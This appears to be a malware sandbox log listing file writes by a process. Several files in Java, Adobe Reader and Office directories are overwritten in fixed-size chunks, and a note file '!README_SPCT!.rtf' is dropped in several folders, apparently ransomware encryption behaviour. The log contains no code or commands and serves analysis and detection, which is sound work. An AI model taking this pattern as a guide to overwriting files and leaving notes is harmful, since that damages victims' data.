1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\COPYING.LGPLv2.1.txt | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Exp_RHP.aapp | size = 1823 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp | size = 1798 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp | size = 1819 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | size = 1848 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | size = 3107 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 3143 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 61440 |
|
8 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DropboxStorage.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\distribute_form.gif | size = 2237 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_initiator.gif | size = 2776 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif | size = 2781 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif | size = 1896 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInAcrobat.gif | size = 2240 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | size = 1836 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 61440 |
|
8 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif | size = 1992 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | size = 2223 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int.gif | size = 8134 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInAcrobat.gif | size = 2247 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif | size = 2868 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | size = 2671 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif | size = 2418 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css | size = 3931 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif | size = 1972 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adc_logo.png | size = 5125 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_highcontrast.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_bow.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Travelocity.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif | size = 8134 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_de.properties | size = 4722 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_TW.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\calendars.properties | size = 2794 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages.properties | size = 4276 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_HK.properties | size = 5168 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | size = 61440 |
|
8 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\flavormap.properties | size = 5344 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.bfc | size = 5186 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.access | size = 5414 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif | size = 2754 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\!README_SPCT!.rtf | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\!README_SPCT!.rtf | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\!README_SPCT!.rtf | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | size = 1972 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\sound.properties | size = 2626 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil_2x.png | size = 5750 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif | size = 2031 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif | size = 2230 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif | size = 2322 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_wob.png | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\hijrah-config-umalqura.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png | size = 4481 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png | size = 5901 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png | size = 1679 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner_dark.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif | size = 1473 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme | size = 8336 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif | size = 2859 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\open_original_form.gif | size = 2222 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\rss.gif | size = 1638 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js | size = 5216 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInTray.gif | size = 2411 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png | size = 5125 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif | size = 2545 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png | size = 1713 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\vscroll-thumb.png | size = 1692 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp | size = 2105 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | size = 1805 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif | size = 1482 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-mac.css | size = 3954 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js | size = 5206 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png | size = 1722 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\ui-strings.js | size = 5269 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js | size = 5168 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png | size = 3436 |
|
1 | |
